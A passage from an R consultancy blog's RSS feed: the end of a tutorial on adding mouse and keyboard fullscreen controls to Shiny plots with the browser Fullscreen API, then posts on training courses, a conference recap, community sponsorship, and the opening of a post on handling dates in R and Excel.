&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fullscreen&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;default&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You could, of course, use double-click to exit fullscreen, too. But the browser will provide the user with means to exit (press Esc, click a button) and using double-click to make something smaller doesn&amp;rsquo;t feel intuitive to me.&lt;/p&gt;
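&lt;p&gt;If you did want double-click to work in both directions, a minimal sketch could look like the following. It relies on &lt;code&gt;document.exitFullscreen&lt;/code&gt;, the counterpart of &lt;code&gt;requestFullscreen&lt;/code&gt;; the function name &lt;code&gt;toggleFullscreen&lt;/code&gt; and its &lt;code&gt;doc&lt;/code&gt; parameter (a stand-in for &lt;code&gt;document&lt;/code&gt;) are assumptions made for illustration:&lt;/p&gt;

```javascript
// Hypothetical toggle: `doc` stands in for the browser's `document`.
function toggleFullscreen(element, doc) {
  if (doc.fullscreenElement) {
    // Something is already fullscreen, so leave fullscreen mode
    return doc.exitFullscreen();
  }
  // Nothing is fullscreen yet, so make this element fullscreen
  return element.requestFullscreen();
}
```

&lt;p&gt;The body of the double-click handler would then reduce to &lt;code&gt;toggleFullscreen(this, document)&lt;/code&gt;, and the &lt;code&gt;cursor: default&lt;/code&gt; rule above would no longer be wanted.&lt;/p&gt;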
&lt;h2 id="adding-keyboard-functionality"&gt;Adding keyboard functionality&lt;/h2&gt;
&lt;p&gt;You&amp;rsquo;ll recall I mentioned adding a &lt;code&gt;tabindex&lt;/code&gt; value of &amp;ldquo;0&amp;rdquo; to each of the plot containers. This means they can be focused by a keyboard user who uses the &amp;ldquo;Tab&amp;rdquo; key to move around the page.&lt;/p&gt;
&lt;img src="assets/keyboard.jpg" srcset="assets/keyboard@2x.jpg 2x" alt="Screenshot of the toy Shiny application with one plot keyboard focused" style="max-width: 750px; display: block; margin-left: auto; margin-right: auto" /&gt;
&lt;p&gt;With a little extra JavaScript we can make the fullscreen behaviour keyboard accessible:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(document).on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;keydown&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(event) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; code &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; event.originalEvent.code;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(code &lt;span style="color:#ff7b72;font-weight:bold"&gt;!==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Enter&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; focus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; document.activeElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; ($plotContainers.toArray().includes(focus)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; focus.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line inside the event handler checks which key has been pressed. If that key is &amp;ldquo;Enter&amp;rdquo; and we&amp;rsquo;re not already in fullscreen we check which element currently has focus. If that element is one of our plot containers we make it fullscreen.&lt;/p&gt;
&lt;h2 id="the-whole-javascript-script"&gt;The whole JavaScript script&lt;/h2&gt;
&lt;p&gt;For convenience and clarity, here&amp;rsquo;s the full fullscreen.js script, with comments added:&lt;/p&gt;
&lt;details open&gt; &lt;summary&gt;www/fullscreen.js&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; () {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;use strict&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// If fullscreen is not supported jump right out
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;document.fullscreenEnabled) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Simple helper to return a Boolean indicating whether
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// already in fullscreen mode
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; isFullscreen() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!!&lt;/span&gt;document.fullscreenElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Get all the plot containers
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; $plotContainers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; $(&lt;span style="color:#a5d6ff"&gt;&amp;#39;.plot-container&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Make plots go fullscreen when double-clicked
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; $plotContainers.on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;dblclick&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; () {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add keyboard controls
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; $(document).on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;keydown&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; (event) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Get name of key pressed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; code &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; event.originalEvent.code;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// If the user presses something other than Enter or
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// we&amp;#39;re already in fullscreen we can jump straight out...
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (code &lt;span style="color:#ff7b72;font-weight:bold"&gt;!==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Enter&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Find the element that currently has focus
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; focus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; document.activeElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// If that element is one of our plots...
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; ($plotContainers.toArray().includes(focus)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// ...make it fullscreen
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; focus.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;h2 id="quick-notes-on-accessibility"&gt;Quick notes on accessibility&lt;/h2&gt;
&lt;p&gt;While we&amp;rsquo;ve added both mouse and keyboard controls for entering fullscreen, you only know how they work &amp;mdash; and that they exist at all &amp;mdash; because I&amp;rsquo;ve outlined them in this article! That is, to keep things simple I&amp;rsquo;ve omitted instructions in the actual app. In the real world, how fullscreen can be entered should be made clear to all users of the app, not just those who&amp;rsquo;ve read an accompanying blog post.&lt;/p&gt;
&lt;p&gt;For similar reasons, I&amp;rsquo;ve omitted alt text from the charts, which is also bad for accessibility. You should see our earlier blog post on &lt;a href="https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/" rel="external"&gt;&amp;ldquo;Alt Text in R: Plots, Reports, and Shiny&amp;rdquo;&lt;/a&gt; for advice on how to do alt text well.&lt;/p&gt;
&lt;p&gt;Finally, the items being made fullscreen here are graphics. But any element can be made fullscreen in browsers that support the API. That includes elements containing descendant focusable elements. In that case, be sure to check the behaviour of these elements isn&amp;rsquo;t adversely affected by the change and ensure they are still accessible to both mouse and keyboard users.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>June Training Update</title><link>https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/</link><pubDate>Tue, 06 Jun 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This summer, we have public courses to take you all the way from the very basics of R, through to using R for statistical modelling, with some data wrangling and intermediate programming in between. Wherever you are on your R journey, take a look at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;upcoming courses&lt;/a&gt; to see if we can help you on your way.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-june-training-update-r-ggplot-dplyr-statistical-modelling"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 26th June 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h3 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 3rd July 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;This course&lt;/a&gt; will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h3 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 10th July 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h3 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 17th July 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypothesis tests, before moving on to ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2022: A recap</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/</link><pubDate>Thu, 25 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With the planning for this year&amp;rsquo;s Shiny in Production conference well under way, we thought now was a good time for a little recap of what happened last year.&lt;/p&gt;
&lt;h3 id="day-one-workshops"&gt;Day One: Workshops&lt;/h3&gt;
&lt;p&gt;The first day of the conference consisted of three workshops delivered by our very own JR trainers.&lt;/p&gt;
&lt;p&gt;The most popular workshop of the day was Introduction to RStudio (now Posit) Connect, which we will be running again in the 2023 conference. This workshop demonstrated a few different workflows to allow you to host, share and scale content such as APIs, Shiny applications and R Markdown documents with RStudio Connect.&lt;/p&gt;
&lt;p&gt;We also ran a workshop on an Introduction to Tableau, demonstrating the basics of using this software to summarise and interactively visualise data. If you&amp;rsquo;re interested in learning more about Tableau, take a look at our Tableau courses, &lt;a href="https://www.jumpingrivers.com/training/course/introduction-to-tableau/" rel="external"&gt;Introduction to Tableau&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Data Exploration with Tableau&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Last but certainly not least, we ran a workshop on Automated Reporting with Quarto. Quarto is a brand new open source publishing system that allows you to dynamically create static or interactive documents and automatically update reports when data changes. This workshop demonstrated how to make a range of outputs, from simple documents to presentations and dashboards. If you&amp;rsquo;re interested in learning more about Quarto, we have a &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt; course, which you might want to check out.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-2022-conference-recap"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="day-two-talks"&gt;Day Two: Talks&lt;/h3&gt;
&lt;p&gt;Last year&amp;rsquo;s speakers set the bar high for our first conference, and we&amp;rsquo;re excited to see what this year&amp;rsquo;s speakers bring to the table! For a full rundown of the talks, take a look at the &lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/" rel="external"&gt;highlights blog&lt;/a&gt;, which was put together by some of our JR data scientists who were in attendance.&lt;/p&gt;
&lt;p&gt;If it&amp;rsquo;s more than just highlights that you&amp;rsquo;re after, we have a &lt;a href="https://www.youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;playlist of talk recordings&lt;/a&gt; on our YouTube channel.&lt;/p&gt;
&lt;p&gt;If this has whetted your appetite, our Early Bird tickets are now available! If you want to take an even more active role in the conference, we&amp;rsquo;re now accepting abstracts. All of the details are on our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;, so head over there to sign up!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Conference and useR Group Sponsorship Opportunities</title><link>https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/</link><pubDate>Tue, 23 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Here at Jumping Rivers, we love data science. One of the huge benefits of data science is transparency. Take R, for example: as an open-source language, it gives something back to the community that propels it to the top of the data science ladder. Just like the world of data science, our ethos is transparency and giving back to the community.&lt;/p&gt;
&lt;h3 id="conference-sponsorship"&gt;Conference sponsorship&lt;/h3&gt;
&lt;p&gt;To help support the community, we are offering automatic sponsorship of any R conference. All the organisers need to do is complete a quick &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;questionnaire&lt;/a&gt; and the money is sent on its way. We have sponsored several events in the past, which can be found on the community page of our website. We have also sponsored several SatRdays events over the last few years, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kampala2019.satrdays.org/" rel="external"&gt;Kampala 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2019.satrdays.org" rel="external"&gt;Newcastle 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nairobi2019.satrdays.org/" rel="external"&gt;Nairobi 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cardiff2019.satrdays.org" rel="external"&gt;Cardiff 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://berlin2019.satrdays.org/" rel="external"&gt;Berlin 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://abidjan2020.satrdays.org/" rel="external"&gt;Abidjan 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2020.satrdays.org" rel="external"&gt;Newcastle 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;London 2023&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So if you are organising an R conference, feel free to tap us for &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;sponsorship&lt;/a&gt;! We&amp;rsquo;re particularly proud of how frictionless we&amp;rsquo;ve made the process.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-conference-and-user-groups-rladies-sponsorship"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="user--r-ladies-groups"&gt;useR / R-Ladies Groups&lt;/h3&gt;
&lt;p&gt;We also offer sponsorship for useR and R-Ladies groups in Europe! We currently sponsor:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Scientists (NEDS) Meetup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Leeds Data Science Meetup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/warwickrug/" rel="external"&gt;Warwick R User Group&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So if you want sponsorship for your group, just complete this &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;quick form&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why should I use R: Handling Dates in R and Excel: Part 3</title><link>https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/</link><pubDate>Thu, 18 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part 3 of an ongoing series on why you should use R. Future
blogs will be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/" rel="external"&gt;Why should I use R: The Excel R Data Wrangling comparison:
Part
1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/why-create-plots-in-r-part-2/" rel="external"&gt;Why should I use R: The Excel R plotting comparison: Part
2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Why should I use R: Handling Dates in R and Excel: Part 3
(This post)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="dates-in-excel"&gt;Dates in Excel&lt;/h3&gt;
&lt;p&gt;Here we will explore the various ways to handle dates in Excel and R.
Dates are a crucial part of data analysis and are used in various fields
such as biology, healthcare, and social sciences. However, working with
dates can be challenging, especially when dealing with large datasets or
multiple formats.&lt;/p&gt;
&lt;p&gt;In Excel, there are several functions available to handle dates, such as
&lt;code&gt;DATE&lt;/code&gt;, &lt;code&gt;YEAR&lt;/code&gt;, &lt;code&gt;MONTH&lt;/code&gt;, and &lt;code&gt;DAY&lt;/code&gt;. Excel also provides various
formatting options to customise the display of dates. However, Excel has
